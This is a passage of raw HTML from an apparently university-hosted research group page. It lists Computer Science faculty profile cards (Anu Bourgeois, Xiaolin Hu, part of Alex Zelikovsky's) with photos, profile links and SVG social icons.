26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 